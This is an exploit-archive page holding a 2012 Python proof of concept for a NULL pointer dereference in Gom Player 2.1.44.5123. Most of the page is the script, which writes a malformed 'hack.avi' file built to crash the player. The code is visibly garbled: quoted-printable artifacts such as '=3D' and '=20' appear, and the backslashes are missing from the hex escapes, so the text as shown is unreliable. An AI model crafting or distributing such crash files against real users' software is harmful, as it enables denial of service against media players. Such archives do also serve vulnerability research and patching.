Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference
# Published : 2012-10-09
# Author :
# Previous Title : MySQL Denial of Service Zeroday PoC
# Next Title : RealPlayer 15.0.6.14 .3gp Crash PoC

# Exploit Title: gom player 2.1.44.5123 (Unicode) NULL pointer dereference =
vulnerability
# Date: 2012.10.09
# Exploit Author: wh1ant
# Software Link: http://app.gomtv.com/gom/GOMPLAYERSETUP.EXE
# Version: 2.1.44.5123 (Unicode)
# Tested on: windows 7 Ultimate k
# Language : python

f =3D open("hack.avi", "wb")
data =3D  "x52x49x46x46xcax67x41x03x41x56x49x20x4cx49x53x54=
" 
        "xc0x00x00x00x68x64x72x6cx61x76x69x68x38x00x00x00" =

        "x6bx04x01x00x9cx5ex07x00x00x00x00x00x10x08x00x00" =

        "x1ex0ax00x00x00x00x00x00x01x00x00x00xe1x52x01x00" =

        "x40x01x00x00xf0x00x00x00x00x00x00x00x00x00x00x00" =

        "x00x00x00x00x00x00x00x00x4cx49x53x54x74x00x00x00" =

        "x73x74x72x6cx73x74x72x68x38x00x00x00x76x69x64x73" =

        "x74x73x63x63x00x00x00x00x00x00x00x00x00x00x00x00" =

        "x01x00x00x00x0fx00x00x00x00x00x00x00x1ex0ax00x00" =

        "xe1x52x01x00x00x00x00x00x00x00x00x00x00x00x00x00" =

        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" =

        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" =

        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" =

        "x00x00x00x00x00x00x00x00x00x00"
               =20
f.write(data)

for i in range(0, 0x71a):
    f.write("x00")

data =3D "x4cx49x53x54xeexbdx40x03x6dx6fx76x69x30x30x64x62=
x3dx4cx00"
f.write(data)

#for i in range(0, 0x41):
for i in range(0, 0x41):
    f.write("x41")
   =20
for i in range(0, 0x41):
    f.write("x00")
       =20
#for i in range(0, 0x41):
for i in range(0, 0x41):
    f.write("x41")
   =20
f.write("x69x64x78x31xe0xa1")

f.close()